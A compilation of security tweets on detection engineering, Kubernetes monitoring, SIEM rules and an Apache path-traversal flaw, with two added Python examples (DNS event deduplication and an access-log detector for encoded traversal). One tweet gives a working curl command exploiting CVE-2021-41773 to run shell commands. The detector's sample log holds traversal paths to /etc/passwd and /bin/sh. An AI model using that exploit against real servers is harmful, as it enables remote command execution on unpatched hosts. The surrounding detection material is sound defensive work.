This is my article about threat detection approaches in Kubernetes environments.
I hope some of the ideas, detections, or monitoring techniques will be useful for other SOC/Detection Engineering teams working with K8s
Topics covered:
• K8s threat detection
• Audit logs
• Falco
• SIEM detections
• Threat hunting approaches
https://t.co/vH56bYkz4Z
#Kubernetes #K8S #ThreatDetection #SOC #DetectionEngineering #CyberSecurity
Kicking off 2024🚀with a blog series on traditional & generative AI in cybersecurity🤖Uncover how each excels, their complementary roles, and why traditional AI remains vital for core detection🛡️This post lays the foundation for key concepts🤓Stay tuned!! https://t.co/LcF7B61cfI
New Microsoft Incident Response team guide shares best practices for security teams and leaders | Microsoft Security Blog #DFIR https://t.co/imykBOtDNl
Launching the interactive Automation Capability Matrix tool today!
https://t.co/uk0r9gnz0t
The matrix started a little over a year ago (https://t.co/SfYbFldlQq) and has been available on Notion since January (https://t.co/OQoi8QD48Z).
Since the initial release, I have used the matrix working with numerous organizations. It offers a solid foundation for beginners to understand what is possible with security automation. For more advanced programs, it serves as a source of inspiration for future implementations, a tool to gauge success, and a means to report outcomes.
Now, the matrix can be fully customized to fit your needs. This includes:
• Adding new categories and capabilities.
• Organizing according to your priorities.
• Tracking automation workflows that align with these capabilities.
• Exporting the configuration
• Dark and light mode
The best part? All of this configuration is stored locally in your browser for privacy. Additionally, the app is also available on GitHub for those who prefer to run it themselves or contribute.
https://t.co/blrNPhuzQh
Happy automating!
My annual recap is out:
- The best posts and projects of 2022
- Some plans for 2023
- A bunch of great reads for the holiday season
Sharing is caring 👇
https://t.co/YfbNca43LC
We analyzed a massive set of 27,510 malicious LNK samples from @virustotal➡️Turns out explorer.exe (with a whopping 87.2% prevalence) is the most abused lolbin, followed by powershell.exe (7.3%), wscript.exe (4.4%), and rundll32.exe (0.5%). More stats⬇️
https://t.co/2T8ZcxIEHp
I reduced a flow of DNS events by a factor of 30 using @vectordotdev aggregation mechanism (transform Dedupe) with almost no loss of information! The performance is amazing. Small victories in the daily SOC routine :)
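As an added illustration of the mechanism the post relies on (this is editor-supplied example code, not the author's pipeline and not Vector's own implementation): a field-based dedupe keeps a bounded cache of recently seen field tuples and drops any event whose selected fields match a cached one, which is what collapses a repetitive resolver feed. The field names, the "refresh on hit" behaviour of the cache and the `num_events` bound are assumptions standing in for Vector's `fields.match` and `cache.num_events`; the DNS events below are constructed.

```python
"""Field-based deduplication of DNS events, in the style of Vector's `dedupe` transform.

Added example, not the author's pipeline and not Vector's own code. Events whose
match-field tuple is already in a bounded LRU cache are dropped; the per-key
count is kept so you can see what the suppressed copies amounted to.
"""
from collections import OrderedDict
from typing import Dict, List, Tuple

# Constructed resolver-log events: one client polling the same name every
# second, plus three distinct queries. Hostnames and addresses are made up.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"ts": i, "client": "10.1.1.20", "qname": "updates.example.com", "qtype": "A", "rcode": "NOERROR"}
    for i in range(50)
] + [
    {"ts": 100, "client": "10.1.1.20", "qname": "xk3j2.bad-domain.example", "qtype": "TXT", "rcode": "NXDOMAIN"},
    {"ts": 101, "client": "10.1.1.21", "qname": "updates.example.com", "qtype": "A", "rcode": "NOERROR"},
    {"ts": 102, "client": "10.1.1.20", "qname": "updates.example.com", "qtype": "AAAA", "rcode": "NOERROR"},
]

# Assumed analogue of Vector's `fields.match`: only these fields decide equality.
DEFAULT_MATCH_FIELDS = ("client", "qname", "qtype", "rcode")


class Dedupe:
    """Drop events whose match-field tuple is already in a bounded LRU cache."""

    def __init__(self, match_fields: Tuple[str, ...], num_events: int = 5000):
        self.match_fields = match_fields
        self.num_events = num_events  # assumed analogue of `cache.num_events`
        self._cache: "OrderedDict[Tuple[str, ...], int]" = OrderedDict()

    def key(self, event: Dict[str, object]) -> Tuple[str, ...]:
        return tuple(str(event.get(f)) for f in self.match_fields)

    def process(self, event: Dict[str, object]) -> bool:
        """Return True if the event should be forwarded, False if it is a duplicate."""
        k = self.key(event)
        if k in self._cache:
            self._cache[k] += 1           # remember how many copies were suppressed
            self._cache.move_to_end(k)    # assumption: a hit refreshes the entry
            return False
        self._cache[k] = 1
        if len(self._cache) > self.num_events:
            self._cache.popitem(last=False)  # evict the least recently seen key
        return True

    def seen_counts(self) -> Dict[Tuple[str, ...], int]:
        """Per-key event counts (kept copy plus suppressed copies) still in the cache."""
        return dict(self._cache)


def dedupe_events(events, match_fields=DEFAULT_MATCH_FIELDS, num_events=5000):
    """Run the events through one Dedupe instance; return (kept events, per-key counts)."""
    d = Dedupe(match_fields, num_events)
    kept = [e for e in events if d.process(e)]
    return kept, d.seen_counts()


def reduction_factor(events: List[Dict[str, object]], **kw) -> float:
    """Events in divided by events out, the figure the post quotes as 'a factor of 30'."""
    kept, _ = dedupe_events(events, **kw)
    return len(events) / len(kept)


if __name__ == "__main__":
    kept, counts = dedupe_events(SAMPLE_EVENTS)
    print(f"{len(SAMPLE_EVENTS)} events in, {len(kept)} out "
          f"(x{reduction_factor(SAMPLE_EVENTS):.1f} reduction)")
    for k, n in counts.items():
        print(n, k)
```

Two things worth checking before relying on such a transform in a SOC pipeline: the cache bound matters (with `num_events=1` and two alternating keys nothing is deduplicated at all), and the number of suppressed copies is the information that does get lost unless you carry a count alongside the kept event, as `seen_counts()` does here.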
#GoogleWorkspace is capable of blocking ALL access from a particular PC to a corporate Google account without providing any information about the malware or the threat that caused the blocking... Even for a #GWS administrator.
Why so obscure?
https://t.co/dZXMhiX7cG
When I read this story by @troyhunt about how @Cloudflare and @Azure misfired to cause a huge bill I felt terrible. I reached out to @scottgu and proposed we split Troy's cost. Scott immediately agreed. Great to support our mutual customers! https://t.co/CPQUX73OaF
🚨 CYBER MONDAY DEALS! 🚨
We have two excellent deals on offer.
1/ Free IP WHOIS API access!
2/ A hugely discounted premium plan!
Full details are in this thread 👇🧵
⏰ ⏰ Part 2 of my blog series to connect @virustotal, @TimesketchProj and @sigma_hq: https://t.co/EWTJ9fLWZf. This time we take a Sigma rule and adjust the Timesketch config to make it work. Enjoy and share if you found it useful. ⏰ ⏰
Here's how to run full commands with arguments via CVE-2021-41773, a path traversal vulnerability, in the event mod_cgi is enabled on Apache 2.4.49
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
Patch urgently.
🚨 Apache has disclosed an *actively exploited* Path traversal flaw in the #opensource "httpd" server. Over 112,000 exposed Apache servers run version 2.4.49, and should be upgraded now!
New fix checks for encoded path traversal characters e.g. /../.%2E/
https://t.co/1tLNc3LAul
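The two posts above describe the same flaw from both sides: the exploit walks out of /cgi-bin/ with ".%2e" segments, and the fix checks for percent-encoded traversal characters. The following is an added detection example for the blue-team side, written for this page and not taken from the posts or from the Apache project: it percent-decodes each request path from access-log lines (two bounded rounds, so a double-encoded "%252e" is unwrapped as well) and flags any path in which a segment has become "..", which is exactly what a literal "../" check on the raw path misses. The log lines, hosts and addresses are constructed; the function names are this example's own.

```python
"""Flag percent-encoded path traversal (CVE-2021-41773 style) in access-log request paths.

Added example, not from the original posts and not Apache code. The raw
request path of the exploit never contains the literal '..', so the check
decodes first and then inspects the segments. All sample data is constructed.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed Apache-style access log lines (hypothetical addresses).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1024
10.0.0.9 - - [05/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 0
10.0.0.7 - - [05/Oct/2021:10:00:04 +0000] "GET /static/app..min.js?v=2 HTTP/1.1" 200 300
10.0.0.8 - - [05/Oct/2021:10:00:05 +0000] "GET /files/%2E%2E%2F%2E%2E%2Fetc/shadow HTTP/1.1" 403 0
10.0.0.8 - - [05/Oct/2021:10:00:06 +0000] "GET /cgi-bin/.%252e/.%252e/bin/sh HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_path(path: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times, stopping early once nothing changes."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_encoded_traversal(path: str) -> bool:
    """True if any segment of the decoded path (query string removed) is exactly '..'.

    Comparing whole segments keeps names like 'app..min.js' from matching.
    """
    decoded = decode_path(path.split("?", 1)[0])
    return any(seg == ".." for seg in re.split(r"[/\\]", decoded))


def find_traversal_hits(log_text: str) -> List[Dict[str, object]]:
    """Scan access-log lines and return the requests whose path traverses after decoding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        if has_encoded_traversal(path):
            hits.append({
                "src": line.split(" ", 1)[0],
                "method": m.group("method"),
                "path": path,
                "decoded": decode_path(path.split("?", 1)[0]),
                # The bypass form: the raw path carries no literal '..' at all.
                "encoded_only": ".." not in path,
            })
    return hits


if __name__ == "__main__":
    for h in find_traversal_hits(SAMPLE_LOG):
        print(h["src"], h["method"], h["path"], "->", h["decoded"])
```

Note the status codes in the constructed lines: a 200 on a decoded path ending in /bin/sh with a POST body is the mod_cgi command-execution case from the first post, whereas a 403 or 404 only tells you someone tried. Either way the server should already be upgraded off 2.4.49, as the second post says.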
Windows Services (Creation) Mind Map covering service creation and detection methods.
Link: https://t.co/CK1HFcUyC6
#Detection #BlueTeam #Windows #Services